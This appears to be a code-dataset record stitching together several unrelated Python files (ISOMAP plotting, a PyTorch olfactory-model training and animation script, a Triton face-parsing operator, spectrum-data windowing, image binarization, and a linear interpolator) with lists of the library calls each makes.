color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)), s=20, edgecolor='k') else: for l in np.unique(self.Y_data): plt.scatter(self.new_data[self.Y_data == l, 0], color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)), s=20, edgecolor='k') ax = plt.gca() ax.axis("equal") plt.show() if __name__ == "__main__": a = ISOMAP(2) # 降至两维 a.make_data() a.Isomap(10) # 用KNN建图 a.result()
[ "matplotlib.pyplot.title", "matplotlib.pyplot.show", "numpy.zeros", "numpy.ones", "sklearn.datasets.make_swiss_roll", "matplotlib.pyplot.figure", "numpy.linalg.svd", "numpy.where", "sklearn.cluster.AgglomerativeClustering", "numpy.max", "matplotlib.pyplot.gca", "numpy.diag", "mpl_toolkits.mplot3d.axes3d.Axes3D", "numpy.unique" ]
[((3258, 3304), 'sklearn.datasets.make_swiss_roll', 'make_swiss_roll', (['(1000)'], {'noise': '(0)', 'random_state': '(0)'}), '(1000, noise=0, random_state=0)\n', (3273, 3304), False, 'from sklearn.datasets import make_swiss_roll\n'), ((4712, 4733), 'numpy.linalg.svd', 'np.linalg.svd', (['self.B'], {}), '(self.B)\n', (4725, 4733), True, 'import numpy as np\n'), ((4792, 4838), 'numpy.diag', 'np.diag', (['(sigma[:self.reduced_dimension] ** 0.5)'], {}), '(sigma[:self.reduced_dimension] ** 0.5)\n', (4799, 4838), True, 'import numpy as np\n'), ((4990, 5016), 'numpy.where', 'np.where', (['(self.D == np.inf)'], {}), '(self.D == np.inf)\n', (4998, 5016), True, 'import numpy as np\n'), ((5204, 5226), 'numpy.zeros', 'np.zeros', (['self.D.shape'], {}), '(self.D.shape)\n', (5212, 5226), True, 'import numpy as np\n'), ((6065, 6077), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6075, 6077), True, 'import matplotlib.pyplot as plt\n'), ((6130, 6144), 'mpl_toolkits.mplot3d.axes3d.Axes3D', 'p3.Axes3D', (['fig'], {}), '(fig)\n', (6139, 6144), True, 'import mpl_toolkits.mplot3d.axes3d as p3\n'), ((6195, 6217), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (6204, 6217), True, 'import numpy as np\n'), ((6501, 6511), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6509, 6511), True, 'import matplotlib.pyplot as plt\n'), ((6575, 6587), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6585, 6587), True, 'import matplotlib.pyplot as plt\n'), ((6597, 6613), 'matplotlib.pyplot.title', 'plt.title', (['"""MDS"""'], {}), "('MDS')\n", (6606, 6613), True, 'import matplotlib.pyplot as plt\n'), ((7258, 7267), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (7265, 7267), True, 'import matplotlib.pyplot as plt\n'), ((7303, 7313), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7311, 7313), True, 'import matplotlib.pyplot as plt\n'), ((628, 654), 'numpy.ones', 'np.ones', (['[n, n]'], {'dtype': 'int'}), '([n, n], dtype=int)\n', (635, 654), True, 'import numpy as np\n'), ((3673, 3688), 'numpy.ones', 'np.ones', (['[n, n]'], {}), '([n, n])\n', (3680, 3688), True, 'import numpy as np\n'), ((6731, 6753), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (6740, 6753), True, 'import numpy as np\n'), ((7024, 7046), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (7033, 7046), True, 'import numpy as np\n'), ((3321, 3374), 'sklearn.cluster.AgglomerativeClustering', 'AgglomerativeClustering', ([], {'n_clusters': '(6)', 'linkage': '"""ward"""'}), "(n_clusters=6, linkage='ward')\n", (3344, 3374), False, 'from sklearn.cluster import AgglomerativeClustering\n'), ((6421, 6444), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (6427, 6444), True, 'import numpy as np\n'), ((6912, 6935), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (6918, 6935), True, 'import numpy as np\n'), ((7169, 7192), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (7175, 7192), True, 'import numpy as np\n')]
import os import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib import collections as mc import torch import task from torchmodel import FullModel from configs import FullConfig import tools device = 'cuda' if torch.cuda.is_available() else 'cpu' def train(config, reload=False, save_everytrainloss=False): # Merge model config with config from dataset dataset_config = tools.load_config(config.data_dir) dataset_config.update(config) config = dataset_config for item in config.__dict__.items(): print(item) if not os.path.exists(config.save_path): os.makedirs(config.save_path) # Save config tools.save_config(config, save_path=config.save_path) # Load dataset train_x, train_y, val_x, val_y = task.load_data(config.data_dir) batch_size = config.batch_size model = FullModel(config=config) model.to(device) optimizer = torch.optim.Adam(model.parameters(), lr=config.lr) train_data = torch.from_numpy(train_x).float().to(device) train_target = torch.from_numpy(train_y).long().to(device) n_save_every = 20 ind_orn = list(range(0, 500, 50)) + list(range(1, 500, 50)) + list(range(2, 500, 50)) weight_layer1, weight_layer2 = [], [] k = 0 for ep in range(config.max_epoch): if config.save_every_epoch: model.save_pickle(ep) model.save(ep) print('[*' + '*'*50 + '*]') print('Epoch {:d}'.format(ep)) model.train() random_idx = np.random.permutation(config.n_train) idx = 0 while idx < config.n_train: if (idx//batch_size) % n_save_every == 0: w_glo = model.w_glo w_orn = model.w_orn weight_layer1.append(w_orn[ind_orn, :]) weight_layer2.append(w_glo[:, :30]) k += 1 batch_indices = random_idx[idx:idx+batch_size] idx += batch_size res = model(train_data[batch_indices], train_target[batch_indices]) optimizer.zero_grad() res['loss'].backward() optimizer.step() np.save(os.path.join(config.save_path, 'w_layer1'), np.array(weight_layer1)) np.save(os.path.join(config.save_path, 'w_layer2'), np.array(weight_layer2)) def main_train(): config = FullConfig() config.initial_pn2kc = 4. / config.N_PN # explicitly set for clarity config.kc_prune_weak_weights = True config.kc_prune_threshold = 1. / config.N_PN config.kc_dropout_rate = 0.5 config.save_path = './files/movie' config.max_epoch = 10 train(config) def main_plot(path): w1 = np.load(os.path.join(path, 'w_layer1.npy')) w2 = np.load(os.path.join(path, 'w_layer2.npy')) w1 = w1[:, :30, :] w2 = w2[:, :, :5] n_plot = 800 # n_plot = 100 w1 = w1[:n_plot] w2 = w2[:n_plot] w1 = w1[::2] w2 = w2[::2] # Normalize w1 /= np.max(w1) w2 /= np.max(w2) rect = [0.1, 0.1, 0.8, 0.8] fig = plt.figure(figsize=(7, 3)) ax = fig.add_axes(rect) ax.set_xlim([-0.1, 2.1]) ax.set_ylim([-1, 51]) plt.axis('off') x1, y1 = np.meshgrid(range(w1.shape[1]), range(w1.shape[2])) x1, y1 = x1.flatten(), y1.flatten() x2, y2 = np.meshgrid(range(w2.shape[1]), range(w2.shape[2])) x2, y2 = x2.flatten(), y2.flatten() lines = list() lines += [[(0, x*49/29.), (1, y)] for x, y in zip(x1, y1)] lines += [[(1, x), (2, y*49/4.)] for x, y in zip(x2, y2)] lc = mc.LineCollection(lines, linewidths=2) ax.add_collection(lc) colors1 = np.array([[228,26,28],[77,175,74],[55,126,184]])/255. colors2 = np.array([[27,158,119],[217,95,2],[117,112,179], [231,41,138],[102,166,30]])/255. ind1 = np.array([0]*10+[1]*10+[2]*10) ax.scatter([0]*w1.shape[1], np.arange(w1.shape[1])*49/29., color=colors1[ind1], s=4) ax.scatter([2]*w2.shape[2], np.arange(w2.shape[2])*49/4., color=colors2, s=4) y_text = 50 fontsize = 14 ax.text(-.05, y_text, 'ORNs', fontsize=fontsize) ax.text(.95, y_text, 'PNs', fontsize=fontsize) ax.text(1.95, y_text, 'KCs', fontsize=fontsize) epoch_text = ax.text(1.85, -4, '0.00 Epochs', fontsize=fontsize) # initialization function: plot the background of each frame # ============================================================================= # def init(): # line.set_segments([]) # return line, # ============================================================================= # animation function. This is called sequentially def animate(i): n1, n2 = len(x1), len(x2) c = np.zeros((n1+n2, 4)) c[:n1, :3] = colors1[x1//10] c[n1:, :3] = colors2[y2] w1_ = w1[i].T.flatten() w2_ = w2[i].T.flatten() c[:n1, 3] = w1_ / w1_.max() c[n1:, 3] = w2_ / w2_.max() lc.set_color(c) epoch_text.set_text(f'{i/40.:0.2f} Epochs') return ax # call the animator. blit=True means only re-draw the parts that have changed. anim = animation.FuncAnimation(fig, animate, frames=w1.shape[0], interval=20) writer = animation.writers['ffmpeg'](fps=30) # anim.save(os.path.join(path, 'movie.mp4'), writer=writer, dpi=600) anim.save(os.path.join(path, 'movie.mp4'), writer=writer, dpi=200) if __name__ == '__main__': main_train() path = './files/movie' main_plot(path) w1 = np.load(os.path.join(path, 'w_layer1.npy')) w2 = np.load(os.path.join(path, 'w_layer2.npy'))
[ "torchmodel.FullModel", "matplotlib.animation.FuncAnimation", "matplotlib.pyplot.figure", "tools.save_config", "numpy.arange", "os.path.join", "configs.FullConfig", "os.path.exists", "numpy.max", "matplotlib.collections.LineCollection", "tools.load_config", "torch.cuda.is_available", "numpy.random.permutation", "torch.from_numpy", "task.load_data", "os.makedirs", "numpy.zeros", "matplotlib.pyplot.axis", "numpy.array" ]
[((267, 292), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (290, 292), False, 'import torch\n'), ((437, 471), 'tools.load_config', 'tools.load_config', (['config.data_dir'], {}), '(config.data_dir)\n', (454, 471), False, 'import tools\n'), ((701, 754), 'tools.save_config', 'tools.save_config', (['config'], {'save_path': 'config.save_path'}), '(config, save_path=config.save_path)\n', (718, 754), False, 'import tools\n'), ((812, 843), 'task.load_data', 'task.load_data', (['config.data_dir'], {}), '(config.data_dir)\n', (826, 843), False, 'import task\n'), ((893, 917), 'torchmodel.FullModel', 'FullModel', ([], {'config': 'config'}), '(config=config)\n', (902, 917), False, 'from torchmodel import FullModel\n'), ((2391, 2403), 'configs.FullConfig', 'FullConfig', ([], {}), '()\n', (2401, 2403), False, 'from configs import FullConfig\n'), ((3005, 3015), 'numpy.max', 'np.max', (['w1'], {}), '(w1)\n', (3011, 3015), True, 'import numpy as np\n'), ((3026, 3036), 'numpy.max', 'np.max', (['w2'], {}), '(w2)\n', (3032, 3036), True, 'import numpy as np\n'), ((3084, 3110), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 3)'}), '(figsize=(7, 3))\n', (3094, 3110), True, 'import matplotlib.pyplot as plt\n'), ((3198, 3213), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3206, 3213), True, 'import matplotlib.pyplot as plt\n'), ((3587, 3625), 'matplotlib.collections.LineCollection', 'mc.LineCollection', (['lines'], {'linewidths': '(2)'}), '(lines, linewidths=2)\n', (3604, 3625), True, 'from matplotlib import collections as mc\n'), ((3864, 3904), 'numpy.array', 'np.array', (['([0] * 10 + [1] * 10 + [2] * 10)'], {}), '([0] * 10 + [1] * 10 + [2] * 10)\n', (3872, 3904), True, 'import numpy as np\n'), ((5172, 5242), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'animate'], {'frames': 'w1.shape[0]', 'interval': '(20)'}), '(fig, animate, frames=w1.shape[0], interval=20)\n', (5195, 5242), True, 'import matplotlib.animation as animation\n'), ((607, 639), 'os.path.exists', 'os.path.exists', (['config.save_path'], {}), '(config.save_path)\n', (621, 639), False, 'import os\n'), ((649, 678), 'os.makedirs', 'os.makedirs', (['config.save_path'], {}), '(config.save_path)\n', (660, 678), False, 'import os\n'), ((1554, 1591), 'numpy.random.permutation', 'np.random.permutation', (['config.n_train'], {}), '(config.n_train)\n', (1575, 1591), True, 'import numpy as np\n'), ((2208, 2250), 'os.path.join', 'os.path.join', (['config.save_path', '"""w_layer1"""'], {}), "(config.save_path, 'w_layer1')\n", (2220, 2250), False, 'import os\n'), ((2252, 2275), 'numpy.array', 'np.array', (['weight_layer1'], {}), '(weight_layer1)\n', (2260, 2275), True, 'import numpy as np\n'), ((2289, 2331), 'os.path.join', 'os.path.join', (['config.save_path', '"""w_layer2"""'], {}), "(config.save_path, 'w_layer2')\n", (2301, 2331), False, 'import os\n'), ((2333, 2356), 'numpy.array', 'np.array', (['weight_layer2'], {}), '(weight_layer2)\n', (2341, 2356), True, 'import numpy as np\n'), ((2722, 2756), 'os.path.join', 'os.path.join', (['path', '"""w_layer1.npy"""'], {}), "(path, 'w_layer1.npy')\n", (2734, 2756), False, 'import os\n'), ((2775, 2809), 'os.path.join', 'os.path.join', (['path', '"""w_layer2.npy"""'], {}), "(path, 'w_layer2.npy')\n", (2787, 2809), False, 'import os\n'), ((3671, 3727), 'numpy.array', 'np.array', (['[[228, 26, 28], [77, 175, 74], [55, 126, 184]]'], {}), '([[228, 26, 28], [77, 175, 74], [55, 126, 184]])\n', (3679, 3727), True, 'import numpy as np\n'), ((3739, 3833), 'numpy.array', 'np.array', (['[[27, 158, 119], [217, 95, 2], [117, 112, 179], [231, 41, 138], [102, 166, 30]]'], {}), '([[27, 158, 119], [217, 95, 2], [117, 112, 179], [231, 41, 138], [\n 102, 166, 30]])\n', (3747, 3833), True, 'import numpy as np\n'), ((4751, 4773), 'numpy.zeros', 'np.zeros', (['(n1 + n2, 4)'], {}), '((n1 + n2, 4))\n', (4759, 4773), True, 'import numpy as np\n'), ((5410, 5441), 'os.path.join', 'os.path.join', (['path', '"""movie.mp4"""'], {}), "(path, 'movie.mp4')\n", (5422, 5441), False, 'import os\n'), ((5576, 5610), 'os.path.join', 'os.path.join', (['path', '"""w_layer1.npy"""'], {}), "(path, 'w_layer1.npy')\n", (5588, 5610), False, 'import os\n'), ((5629, 5663), 'os.path.join', 'os.path.join', (['path', '"""w_layer2.npy"""'], {}), "(path, 'w_layer2.npy')\n", (5641, 5663), False, 'import os\n'), ((3927, 3949), 'numpy.arange', 'np.arange', (['w1.shape[1]'], {}), '(w1.shape[1])\n', (3936, 3949), True, 'import numpy as np\n'), ((4016, 4038), 'numpy.arange', 'np.arange', (['w2.shape[2]'], {}), '(w2.shape[2])\n', (4025, 4038), True, 'import numpy as np\n'), ((1024, 1049), 'torch.from_numpy', 'torch.from_numpy', (['train_x'], {}), '(train_x)\n', (1040, 1049), False, 'import torch\n'), ((1088, 1113), 'torch.from_numpy', 'torch.from_numpy', (['train_y'], {}), '(train_y)\n', (1104, 1113), False, 'import torch\n')]
from abc import ABC import cv2 import numpy as np from Operators.DummyAlgorithmWithModel import DummyAlgorithmWithModel from Utils.GeometryUtils import center_pad_image_with_specific_base, \ resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation from Utils.InferenceHelpers import TritonInferenceHelper class FaceParsingOperator(DummyAlgorithmWithModel, ABC): name = 'FaceParsing' __version__ = 'v1.0.20210323' def __init__(self, _inference_config, _is_test): super().__init__(_inference_config, _is_test) class GeneralFaceParsing(FaceParsingOperator): """ 获取人脸面部分区,除了面部区域,其他地方准确率很低 例如耳环、眼镜等 """ name = '自然场景下基于BiSeNet人脸面部的语义分割' __version__ = 'v1.0.20210323' def __init__(self, _inference_config, _is_test): """ 每个下标对应的意思 0 背景 1 皮肤区域 2 右眉毛 3 左眉毛 4 右眼睛 5 左眼睛 6 眼镜 7 右耳朵 8 左耳朵 9 耳环 10 鼻子 11 口腔 12 上嘴唇 13 下嘴唇 14 颈部 15 16 衣服 17 头发 18 帽子 """ super().__init__(_inference_config, _is_test) # 模型未限制,但是为了保证效率,将图像都统一到512 self.candidate_image_size = (512, 512) def get_inference_helper(self): if self.inference_config['name'] == 'triton': inference_helper = TritonInferenceHelper('FaceParsing', self.inference_config['triton_url'], self.inference_config['triton_port'], 'FaceParsing', 1) inference_helper.add_image_input('INPUT__0', (512, 512, 3), '检测用rgb的图像', ([103.53, 116.28, 123.675], [57.375, 57.12, 58.395])) inference_helper.add_output('OUTPUT__0', (19, 512, 512), '每个类别的区域') self.inference_helper = inference_helper else: raise NotImplementedError( f"{self.inference_config['name']} helper for face parsing not implement") def execute(self, _image, _landmark_info=None): to_return_result = { 'semantic_segmentation': np.zeros((_image.shape[1], _image.shape[0]), dtype=np.uint8), } if _landmark_info is not None: corrected_face_image, rotate_back_function = correct_face_orientation(_image, _landmark_info) else: corrected_face_image = _image def _rotate_back_function(_image): return _image rotate_back_function = _rotate_back_function original_h, original_w = corrected_face_image.shape[:2] resized_image = resize_with_long_side(corrected_face_image, 512) resized_h, resized_w = resized_image.shape[:2] padded_image, (width_pad_ratio, height_pad_ratio) = center_pad_image_with_specific_base( resized_image, _width_base=512, _height_base=512, _output_pad_ratio=True ) candidate_image = cv2.cvtColor(force_convert_image_to_bgr(padded_image), cv2.COLOR_BGR2RGB) candidate_h, candidate_w = candidate_image.shape[:2] if isinstance(self.inference_helper, TritonInferenceHelper): result = self.inference_helper.infer(_need_tensor_check=False, INPUT__0=candidate_image.astype(np.float32)) semantic_index = result['OUTPUT__0'].squeeze() else: raise NotImplementedError( f"{self.inference_helper.type_name} helper for face parsing not implement") left_width_pad = int(width_pad_ratio * candidate_w) top_height_pad = int(height_pad_ratio * candidate_h) # 去除pad semantic_index_without_pad = semantic_index[ top_height_pad:top_height_pad + resized_h, left_width_pad:left_width_pad + resized_w ] # 恢复resize resize_back_semantic_index = cv2.resize(semantic_index_without_pad, (original_w, original_h), interpolation=cv2.INTER_NEAREST) # 恢复图像方向 original_orientation_semantic_index = rotate_back_function(resize_back_semantic_index) to_return_result['semantic_segmentation'] = original_orientation_semantic_index return to_return_result if __name__ == '__main__': from argparse import ArgumentParser from Utils.AnnotationTools import annotate_segmentation from Operators.ExampleFaceDetectOperator import GeneralUltraLightFaceDetect from Operators.ExampleFaceAlignmentOperator import GeneralLandmark106p from Utils.GeometryUtils import get_rotated_box_roi_from_image ag = ArgumentParser('Face Parsing Example') ag.add_argument('-i', '--image_path', dest='image_path', type=str, required=True, help='本地图像路径') ag.add_argument('-u', '--triton_url', dest='triton_url', type=str, required=True, help='triton url') ag.add_argument('-p', '--triton_port', dest='triton_port', type=int, default=8001, help='triton grpc 端口') args = ag.parse_args() # 假设图中只有一个人头 img = cv2.imread(args.image_path) face_parsing_handler = GeneralFaceParsing({ 'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.triton_port }, True) ultra_light_face_detect_handler = GeneralUltraLightFaceDetect({ 'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.triton_port }, True, 0.7, 0.5) landmark106p_detect_handler = GeneralLandmark106p({ 'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.triton_port }, True) face_bbox = ultra_light_face_detect_handler.execute(img)['locations'][0]['box_info'] cropped_image = get_rotated_box_roi_from_image(img, face_bbox, 1.35) landmark_info = landmark106p_detect_handler.execute(cropped_image) landmark106p_with_bbox_result_image = cropped_image.copy() landmark106p_with_bbox_result_all_points = [(x, y) for x, y in zip(landmark_info['x_locations'], landmark_info['y_locations']) ] face_parsing_with_bbox_result = face_parsing_handler.execute(cropped_image, landmark_info) face_parsing_with_bbox_result_image = cropped_image.copy() face_parsing_with_bbox_result_image = annotate_segmentation( face_parsing_with_bbox_result_image, face_parsing_with_bbox_result['semantic_segmentation'] ) cv2.imshow(f'face_parsing_with_bbox_result_image', face_parsing_with_bbox_result_image) cv2.waitKey(0) cv2.destroyAllWindows()
[ "Operators.ExampleFaceAlignmentOperator.GeneralLandmark106p", "Utils.AnnotationTools.annotate_segmentation", "argparse.ArgumentParser", "Utils.GeometryUtils.correct_face_orientation", "Operators.ExampleFaceDetectOperator.GeneralUltraLightFaceDetect", "cv2.waitKey", "cv2.destroyAllWindows", "Utils.GeometryUtils.resize_with_long_side", "Utils.InferenceHelpers.TritonInferenceHelper", "numpy.zeros", "Utils.GeometryUtils.force_convert_image_to_bgr", "Utils.GeometryUtils.get_rotated_box_roi_from_image", "cv2.imread", "Utils.GeometryUtils.center_pad_image_with_specific_base", "cv2.imshow", "cv2.resize" ]
[((4815, 4853), 'argparse.ArgumentParser', 'ArgumentParser', (['"""Face Parsing Example"""'], {}), "('Face Parsing Example')\n", (4829, 4853), False, 'from argparse import ArgumentParser\n'), ((5224, 5251), 'cv2.imread', 'cv2.imread', (['args.image_path'], {}), '(args.image_path)\n', (5234, 5251), False, 'import cv2\n'), ((5456, 5588), 'Operators.ExampleFaceDetectOperator.GeneralUltraLightFaceDetect', 'GeneralUltraLightFaceDetect', (["{'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.\n triton_port}", '(True)', '(0.7)', '(0.5)'], {}), "({'name': 'triton', 'triton_url': args.\n triton_url, 'triton_port': args.triton_port}, True, 0.7, 0.5)\n", (5483, 5588), False, 'from Operators.ExampleFaceDetectOperator import GeneralUltraLightFaceDetect\n'), ((5648, 5761), 'Operators.ExampleFaceAlignmentOperator.GeneralLandmark106p', 'GeneralLandmark106p', (["{'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.\n triton_port}", '(True)'], {}), "({'name': 'triton', 'triton_url': args.triton_url,\n 'triton_port': args.triton_port}, True)\n", (5667, 5761), False, 'from Operators.ExampleFaceAlignmentOperator import GeneralLandmark106p\n'), ((5897, 5949), 'Utils.GeometryUtils.get_rotated_box_roi_from_image', 'get_rotated_box_roi_from_image', (['img', 'face_bbox', '(1.35)'], {}), '(img, face_bbox, 1.35)\n', (5927, 5949), False, 'from Utils.GeometryUtils import get_rotated_box_roi_from_image\n'), ((6565, 6683), 'Utils.AnnotationTools.annotate_segmentation', 'annotate_segmentation', (['face_parsing_with_bbox_result_image', "face_parsing_with_bbox_result['semantic_segmentation']"], {}), "(face_parsing_with_bbox_result_image,\n face_parsing_with_bbox_result['semantic_segmentation'])\n", (6586, 6683), False, 'from Utils.AnnotationTools import annotate_segmentation\n'), ((6706, 6797), 'cv2.imshow', 'cv2.imshow', (['f"""face_parsing_with_bbox_result_image"""', 'face_parsing_with_bbox_result_image'], {}), "(f'face_parsing_with_bbox_result_image',\n face_parsing_with_bbox_result_image)\n", (6716, 6797), False, 'import cv2\n'), ((6798, 6812), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (6809, 6812), False, 'import cv2\n'), ((6817, 6840), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (6838, 6840), False, 'import cv2\n'), ((2746, 2794), 'Utils.GeometryUtils.resize_with_long_side', 'resize_with_long_side', (['corrected_face_image', '(512)'], {}), '(corrected_face_image, 512)\n', (2767, 2794), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((2910, 3023), 'Utils.GeometryUtils.center_pad_image_with_specific_base', 'center_pad_image_with_specific_base', (['resized_image'], {'_width_base': '(512)', '_height_base': '(512)', '_output_pad_ratio': '(True)'}), '(resized_image, _width_base=512,\n _height_base=512, _output_pad_ratio=True)\n', (2945, 3023), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((4076, 4177), 'cv2.resize', 'cv2.resize', (['semantic_index_without_pad', '(original_w, original_h)'], {'interpolation': 'cv2.INTER_NEAREST'}), '(semantic_index_without_pad, (original_w, original_h),\n interpolation=cv2.INTER_NEAREST)\n', (4086, 4177), False, 'import cv2\n'), ((1381, 1514), 'Utils.InferenceHelpers.TritonInferenceHelper', 'TritonInferenceHelper', (['"""FaceParsing"""', "self.inference_config['triton_url']", "self.inference_config['triton_port']", '"""FaceParsing"""', '(1)'], {}), "('FaceParsing', self.inference_config['triton_url'],\n self.inference_config['triton_port'], 'FaceParsing', 1)\n", (1402, 1514), False, 'from Utils.InferenceHelpers import TritonInferenceHelper\n'), ((2249, 2309), 'numpy.zeros', 'np.zeros', (['(_image.shape[1], _image.shape[0])'], {'dtype': 'np.uint8'}), '((_image.shape[1], _image.shape[0]), dtype=np.uint8)\n', (2257, 2309), True, 'import numpy as np\n'), ((2417, 2465), 'Utils.GeometryUtils.correct_face_orientation', 'correct_face_orientation', (['_image', '_landmark_info'], {}), '(_image, _landmark_info)\n', (2441, 2465), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((3117, 3157), 'Utils.GeometryUtils.force_convert_image_to_bgr', 'force_convert_image_to_bgr', (['padded_image'], {}), '(padded_image)\n', (3143, 3157), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n')]
import numpy as np import os import pickle import joblib import sys import glob import torch window_size = 1000 normality = str(sys.argv[1]) # e.g. abnormal source = str(sys.argv[2]) # e.g. ryerson_ab_train_sigOver outname = '{}_{}.npy'.format(source, normality) input_path = '/net/adv_spectrum/data/feature/downsample_10/{}/{}/1000_250/'.format(normality, source) output_path = '/net/adv_spectrum/array_data/{}'.format(outname) def array_to_window(X, window_size): """ Inputs: X (np.array): Its shape should be (n_time_steps, 128) window_size (int): the number of time steps in a window Return: result (np.array): Its shape should be (n_windows, 1, window_size, 128) """ result = [] ind = np.arange(0, X.shape[0], window_size) for start, end in zip(ind, np.r_[ind[1:], X.shape[0]]): if end - start < window_size: # Discard the last few lines break result.append(X[start:end, :]) return np.array(result) def txt_to_series(file_path, n_channels=128): features = [] with open(file_path, 'r') as f: for line in f: x = line.split() features.append(x) series = np.array(features).reshape((-1, n_channels)).astype('float64') return series series_list = [] print('Start constructing normal series....') for filename in sorted(glob.glob(input_path + '*.txt')): print(filename) series = txt_to_series(filename) print(series.shape) series_list.append(series) X_full= array_to_window(series_list.pop(0), window_size) for i, X in enumerate(series_list): print('Converting the {}th array to window...'.format(i)) X_windowed = array_to_window(X, window_size) print('Concatenating...\n') X_full = np.concatenate((X_full, X_windowed), axis=0) print('Done converting and concatenating!') np.save(output_path, X_full) print('The array has been saved at {}'.format(output_path))
[ "numpy.save", "numpy.array", "numpy.arange", "glob.glob", "numpy.concatenate" ]
[((1864, 1892), 'numpy.save', 'np.save', (['output_path', 'X_full'], {}), '(output_path, X_full)\n', (1871, 1892), True, 'import numpy as np\n'), ((744, 781), 'numpy.arange', 'np.arange', (['(0)', 'X.shape[0]', 'window_size'], {}), '(0, X.shape[0], window_size)\n', (753, 781), True, 'import numpy as np\n'), ((991, 1007), 'numpy.array', 'np.array', (['result'], {}), '(result)\n', (999, 1007), True, 'import numpy as np\n'), ((1377, 1408), 'glob.glob', 'glob.glob', (["(input_path + '*.txt')"], {}), "(input_path + '*.txt')\n", (1386, 1408), False, 'import glob\n'), ((1773, 1817), 'numpy.concatenate', 'np.concatenate', (['(X_full, X_windowed)'], {'axis': '(0)'}), '((X_full, X_windowed), axis=0)\n', (1787, 1817), True, 'import numpy as np\n'), ((1208, 1226), 'numpy.array', 'np.array', (['features'], {}), '(features)\n', (1216, 1226), True, 'import numpy as np\n')]
#!/usr/bin/python3 # -*- coding: utf-8 -*- import numpy as np from PIL import Image import pylab as pl import matplotlib.cm as cm def int2B(pat, binary=True): _ = np.array(pat, float) for i in range(len(_)): for j in range(len(_[i])): if binary: if pat[i][j] > 130: _[i][j] = 1 else: _[i][j] = 0 else: if j > 75: _[i][j] = 1 else: _[i][j] = -1 r = np.array(_, float).reshape(1,54000).flatten() return r un = np.array(Image.open('data/picture/1.jpg').convert('L')) deux = np.array(Image.open('data/picture/2.jpg').convert('L')) trois = np.array(Image.open('data/picture/3.jpg').convert('L')) quatre = np.array(Image.open('data/picture/4.jpg').convert('L')) visages = [int2B(un), int2B(deux), int2B(trois), int2B(quatre)]
[ "numpy.array", "PIL.Image.open" ]
[((169, 189), 'numpy.array', 'np.array', (['pat', 'float'], {}), '(pat, float)\n', (177, 189), True, 'import numpy as np\n'), ((613, 645), 'PIL.Image.open', 'Image.open', (['"""data/picture/1.jpg"""'], {}), "('data/picture/1.jpg')\n", (623, 645), False, 'from PIL import Image\n'), ((676, 708), 'PIL.Image.open', 'Image.open', (['"""data/picture/2.jpg"""'], {}), "('data/picture/2.jpg')\n", (686, 708), False, 'from PIL import Image\n'), ((740, 772), 'PIL.Image.open', 'Image.open', (['"""data/picture/3.jpg"""'], {}), "('data/picture/3.jpg')\n", (750, 772), False, 'from PIL import Image\n'), ((805, 837), 'PIL.Image.open', 'Image.open', (['"""data/picture/4.jpg"""'], {}), "('data/picture/4.jpg')\n", (815, 837), False, 'from PIL import Image\n'), ((538, 556), 'numpy.array', 'np.array', (['_', 'float'], {}), '(_, float)\n', (546, 556), True, 'import numpy as np\n')]
import numpy as np from ...utils import transform_utils as T from .base_interpolator import Interpolator class LinearInterpolator(Interpolator): """ Simple class for implementing a linear interpolator. Abstracted to interpolate n-dimensions Args: max_delta: Maximum single change in dx allowed by the system. Note that this should be in units magnitude / step ndim: Number of dimensions to interpolate controller_freq: Frequency (Hz) of the controller policy_freq: Frequency (Hz) of the policy model ramp_ratio: Percentage of interpolation timesteps across which we will interpolate to a goal position. Note: Num total interpolation steps will be equal to np.floor(ramp_ratio * controller_freq / policy_freq) i.e.: how many controller steps we get per action space update use_delta_goal: Whether to interpret inputs as delta goals from a current position or absolute values ori_interpolate: Whether this interpolator is interpolating angles (orientation) or not """ def __init__(self, max_delta, ndim, controller_freq, policy_freq, ramp_ratio=0.2, use_delta_goal=False, ori_interpolate=False, ): self.max_delta = max_delta # Maximum allowed change per interpolator step self.goal = None # Requested goal self.start = None # Start state self.dim = ndim # Number of dimensions to interpolate self.order = 1 # Order of the interpolator (1 = linear) self.step = 0 # Current step of the interpolator self.total_steps = \ np.ceil(ramp_ratio * controller_freq / policy_freq) # Total num steps per interpolator action self.use_delta_goal = use_delta_goal # Whether to use delta or absolute goals (currently # not implemented yet- TODO) self.ori_interpolate = ori_interpolate # Whether this is interpolating orientation or not def set_goal(self, goal, start=None): """ set_goal: Takes a requested 